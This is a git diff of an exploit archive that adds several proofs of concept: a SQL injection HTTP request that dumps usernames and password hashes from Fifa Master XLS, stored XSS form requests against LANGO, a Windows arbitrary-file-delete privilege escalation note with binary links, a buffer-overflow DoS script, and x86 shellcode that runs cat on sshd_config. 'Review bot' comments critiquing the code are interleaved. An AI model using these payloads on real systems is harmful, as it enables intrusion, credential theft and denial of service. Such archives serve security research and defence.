@@ -0,0 +1,61 @@ +# Exploit Title: Fifa Master XLS 2.3.2 - 'usw' SQL Injection +# Dork: N/A +# Date: 2018-10-24 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://fankstribe.org/ +# Software Link: https://sourceforge.net/projects/fifamasterxls/files/latest/download +# Version: 2.3.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/chat.php?action=chatname&usw=[SQL] +# +# Registered users can run... +/* `exploitdb`.`f_user` */ +$f_user = array( + array('userID' => '2','access' => 'Registered','userName' => 'efe','firstname' => 'efe','lastName' => 'efe','userEmail' => 'efe@omerefe.com','userPassword' => 'a0b92793d636e4ccee294c6548cb35b3','avatar' => '0.jpg','ban' => '0') +); +# + +# [PATH]/chat.php 166 +# +# 163 function chatName() { +# 164 $un = ''; +# 165 global $con; +# 166 $su=$_GET['usw']; +# 167 +# 168 $sc2=mysql_query("select userName from f_user where userID='$su' limit 1"); +# 169 while($row_sc2=mysql_fetch_array($sc2)) +# 170 { + +# [PATH]/js/chat.js 337 +# +# 336 jQuery.ajax({ +# 337 url: "chat.php?action=chatname&usw="+item.f, +# 338 cache: false, +# 339 dataType: "json", +# 340 async: false, +# 341 success: function(data) + +GET /[PATH]/chat.php?action=chatname&usw=-%27++uNiOn+sElecT++(seLEcT(@x)FRom(SElecT(@x:=0x00)%20,(sELeCt(@x)fRom(f_user)whERe(@x)In(@x:=conCat(0x20,@x,0x557365726e616d653a20,userName,0x3c62723e,0x506173733a20,userPassword,0x3c62723e))))x)--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=io5hsssef7l7nich1si2gk99k5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 23 Oct 2018 00:12:37 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, 
must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 148 +Keep-Alive: timeout=5, max=1 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45672.txt b/exploits/php/webapps/45672.txt new file mode 100644 index 000000000..d144fd75b --- /dev/null +++ b/exploits/php/webapps/45672.txt @@ -0,0 +1,48 @@ +# Exploit Title: LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting +# Date: 2018-10-16 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: http://pokkho.com/lango/ +# Software Link : http://pokkho.com/lango/auth/login +# Software : LANGO - Codeigniter Multilingual Script +# Version : 1.0 +# Vulernability Type : Code Injection +# Vulenrability : HTML Injection and Stored XSS +# CVE : CVE-2018-18416 + +# LANGO Codeigniter Multilingual Script 1.0 has XSS in the input and upload sections, as demonstrated by the +# site_name parameter to the admin/settings/update URI. + +# HTTP POST Request : + +POST /lango/admin/settings/update HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/lango/admin/settings +Content-Type: multipart/form-data; boundary=---------------------------180989082911182658591910516947 +Content-Length: 3150615 +Cookie: csrf_cookie_name=4eeae5fca11e4ae108d667b67b52a0b3; ci_session=7ghu11a49n5ethf596t6g1ec5kfscncp +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="site_name" + +">

Ismail Tasdelen

+-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="site_title" + +">

Ismail Tasdelen

+-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="keywords" + +Multilanguage ,Codeigniter Multilanguage Script,">

Ismail Tasdelen

+-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="description" + +">

Ismail Tasdelen

+-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="photo1"; filename="\">.jpg" +Content-Type: image/jpeg \ No newline at end of file diff --git a/exploits/windows/local/45675.md b/exploits/windows/local/45675.md new file mode 100644 index 000000000..1ede26a0b --- /dev/null +++ b/exploits/windows/local/45675.md @@ -0,0 +1,17 @@ +Bug description: + +`RpcDSSMoveFromSharedFile(handle,L"token",L"c:\\blah1\\pci.sys");` + +This function exposed over alpc, has a arbitrary delete vuln. + +Hitting the timing was pretty annoying. But my PoC will keep rerunning until c:\windows\system32\drivers\pci.sys is deleted. + +I believe it's impossible to hit the timing on a single core VM. I was able to trigger it using 4 cores on my VM. (Sadly I wasn't able to use OPLOCKS with this particular bug) + +Root cause is basically just a delete without impersonation because of an early revert to self. Should be straight forward to fix it... + +Exploitation wise... you either try to trigger DLL hijacking issues in 3rd party software.. or delete temp files used by a system service in c:\windows\temp and hijack them and hopefully do some evil stuff. + + +EDB Note ~ Source: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45675-1.rar +EDB Note ~ Binary: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45675-2.exe \ No newline at end of file diff --git a/exploits/windows_x86/dos/45670.txt b/exploits/windows_x86/dos/45670.txt new file mode 100644 index 000000000..9d052ceee --- /dev/null +++ b/exploits/windows_x86/dos/45670.txt 
@@ -0,0 +1,27 @@
+# Exploit Title: ADULT FILTER 1.0 - Denial of Service (PoC)
+# Date: 2018-10-28
+# Exploit Author: Beren Kuday GÖRÜN
+# Vendor Homepage: http://www.armcode.com/adult-filter/
+# Software Link: http://www.armcode.com/downloads/adult-filter.exe
+# Version: 1.0 (Build 2007-Mar-12)
+# Tested on OS: Windows XP Professional sp3 (ENG)
+
+# Steps to Reproduce: Run the python3 exploit script, it will create a new
+# file with the name "boom_for_Adult_Filter.txt". Copy the content of the
+# new file "boom_for_Adult_Filter.txt". Now start the program. When you
+# open the program, select 'Options >> Black Domain List ...' from the
+# menu item. In the window that opens, enter the text in the file you
+# created with python3 script the 'Add the domain list' section.
+# Press the 'Add' button and then press the 'OK' button.
+# And see a crash!
+
+buffer = "A" * 4500
+
+try:
+ file = open("boom_for_Adult_Filter.txt","w")
+ file.write(buffer)
+ file.close()
+ print("[*] Ready for Denial of Service")
+
+except:
+ print("[*] Error: Failed to create file")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 79cbdf345..045a0429b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
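Review bot: The bare `except:` at the bottom of the hunk swallows every exception, including `KeyboardInterrupt` and `SystemExit`, and discards the reason the file could not be written; it also masks that `file.close()` is skipped whenever `write()` raises. Narrow the handler and let a context manager own the close: `with open("boom_for_Adult_Filter.txt", "w") as f:` / `    f.write(buffer)` and `except OSError as exc: print("[*] Error: Failed to create file:", exc)`. The `# Date: 2018-10-28` header also post-dates the 2018-10-24 row this same commit adds to files_exploits.csv, which looks like a typo in the header.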
@@ -6156,6 +6156,7 @@ id,file,description,date,author,type,platform,port
 45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple,
 45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios,
 45658,exploits/windows/dos/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)",2018-10-23,hyp3rlinx,dos,windows,
+45670,exploits/windows_x86/dos/45670.txt,"Adult Filter 1.0 - Denial of Service (PoC)",2018-10-24,"Beren Kuday GÖRÜN",dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10048,6 +10049,7 @@ id,file,description,date,author,type,platform,port
 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
 45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
 45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
+45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -10296,7 +10298,7 @@ id,file,description,date,author,type,platform,port
 730,exploits/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution",2004-12-28,ShredderSub7,remote,windows,
 733,exploits/windows/remote/733.c,"Microsoft Windows Server 2000 - WINS Remote Code Execution",2004-12-31,zuc,remote,windows,42
 734,exploits/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031)",2004-12-31,houseofdabus,remote,windows,139
-745,exploits/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (CGI)",2005-01-08,ZzagorR,remote,multiple,10000
+745,exploits/multiple/remote/745.pl,"Webmin 1.5 - Web Brute Force (CGI)",2005-01-08,ZzagorR,remote,multiple,10000
 746,exploits/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,remote,multiple,10000
 750,exploits/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,remote,windows,6101
 753,exploits/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)",2005-01-12,Skylined,remote,windows,
@@ -16888,6 +16890,7 @@ id,file,description,date,author,type,platform,port
 45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows,
 45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware,
 45638,exploits/linux/remote/45638.py,"libSSH - Authentication Bypass",2018-10-18,"Dayanç Soyadlı",remote,linux,
+45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40177,6 +40180,14 @@ id,file,description,date,author,type,platform,port
 45659,exploits/php/webapps/45659.txt,"SIM-PKH 2.4.1 - Arbitrary File Upload",2018-10-23,"Ihsan Sencan",webapps,php,
 45661,exploits/windows/webapps/45661.txt,"ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection",2018-10-23,hyp3rlinx,webapps,windows,
 45662,exploits/php/webapps/45662.txt,"School ERP Pro+Responsive 1.0 - Arbitrary File Download",2018-10-23,"Ihsan Sencan",webapps,php,
-45663,exploits/php/webapps/45663.txt,"School ERP Pro+Responsive 1.0 - 'fid' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
-45664,exploits/php/webapps/45664.txt,"SIM-PKH 2.4.1 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
-45665,exploits/windows/webapps/45665.txt,"MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,windows,
+45663,exploits/php/webapps/45663.txt,"School ERP Pro+Responsive 1.0 - 'fid' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,80
+45664,exploits/php/webapps/45664.txt,"SIM-PKH 2.4.1 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,80
+45665,exploits/windows/webapps/45665.txt,"MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,windows,80
+45666,exploits/php/webapps/45666.txt,"SG ERP 1.0 - 'info' SQL Injection",2018-10-24,"Ihsan Sencan",webapps,php,80
+45667,exploits/php/webapps/45667.txt,"Fifa Master XLS 2.3.2 - 'usw' SQL Injection",2018-10-24,"Ihsan Sencan",webapps,php,
+45668,exploits/aspx/webapps/45668.txt,"Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting",2018-10-24,"Dino Barlattani",webapps,aspx,
+45672,exploits/php/webapps/45672.txt,"LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting",2018-10-24,"Ismail Tasdelen",webapps,php,
+45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java,
+45676,exploits/hardware/webapps/45676.md,"D-Link Routers - Command Injection",2018-10-12,"Blazej Adamczyk",webapps,hardware,
+45677,exploits/hardware/webapps/45677.md,"D-Link Routers - Plaintext Password",2018-10-12,"Blazej Adamczyk",webapps,hardware,
+45678,exploits/hardware/webapps/45678.md,"D-Link Routers - Directory Traversal",2018-10-12,"Blazej Adamczyk",webapps,hardware,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 827c22a47..8df0ac196 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -920,3 +920,4 @@ id,file,description,date,author,type,platform
 45495,shellcodes/arm/45495.c,"Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)",2018-09-26,"Ken Kitahara",shellcode,arm
 45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86
 45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
+45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/45669.c b/shellcodes/linux_x86/45669.c
new file mode 100644
index 000000000..f208b7fb1
--- /dev/null
+++ b/shellcodes/linux_x86/45669.c
@@ -0,0 +1,52 @@
+/*
+# Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
+# Author: Goutham Madhwaraj
+# Date: 2018-10-22
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 44
+# ShoutOut - BarrierSec
+# gcc -fno-stack-protector -z execstack loader-bind.c -o
+
+Disassembly of section .text:
+
+08048080 <_start>:
+ 8048080: 31 c0 xor eax,eax
+ 8048082: 50 push eax
+ 8048083: 68 2f 63 61 74 push 0x7461632f
+ 8048088: 68 2f 62 69 6e push 0x6e69622f
+ 804808d: 89 e3 mov ebx,esp
+ 804808f: 50 push eax
+ 8048090: 68 6e 66 69 67 push 0x6769666e
+ 8048095: 68 64 5f 63 6f push 0x6f635f64
+ 804809a: 68 2f 73 73 68 push 0x6873732f
+ 804809f: 68 2f 73 73 68 push 0x6873732f
+ 80480a4: 68 2f 65 74 63 push 0x6374652f
+ 80480a9: 89 e1 mov ecx,esp
+ 80480ab: 6a 00 push 0x0
+ 80480ad: 51 push ecx
+ 80480ae: 53 push ebx
+ 80480af: 89 e1 mov ecx,esp
+ 80480b1: 50 push eax
+ 80480b2: 89 e2 mov edx,esp
+ 80480b4: b0 0b mov al,0xb
+ 80480b6: cd 80 int 0x80
+
+===============POC by Goutham Madhwaraj=========================
+*/
+
+#include 
+#include 
+
+unsigned char code[] = \
+"\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6e\x66\x69\x67\x68\x64\x5f\x63\x6f\x68\x2f\x73\x73\x68\x68\x2f\x73\x73\x68\x68\x2f\x65\x74\x63\x89\xe1\x6a\x00\x51\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80";
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
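Review bot: The `# Shellcode Length: 44` header and the title disagree with the bytes actually in `code[]`: the listing runs from 8048080 through the two-byte `cd 80` at 80480b6, i.e. 56 bytes, and the `\x6a\x00` emitted for `push 0x0` places a NUL at offset 44, so `strlen(code)` stops there and the printed 44 is an artifact of the terminator, not the payload size. Derive the length from the array instead, `printf("Shellcode Length: %zu\n", sizeof code - 1);`, which also fixes the `%d` conversion applied to a `size_t` argument. `main()` with an implicit `int` return type is not valid C99 or later; `int main(void)` is the portable spelling. The two `#include` lines are empty as printed, presumably `<stdio.h>` and `<string.h>` lost to extraction, and the build line `gcc -fno-stack-protector -z execstack loader-bind.c -o` is missing the output name after `-o`.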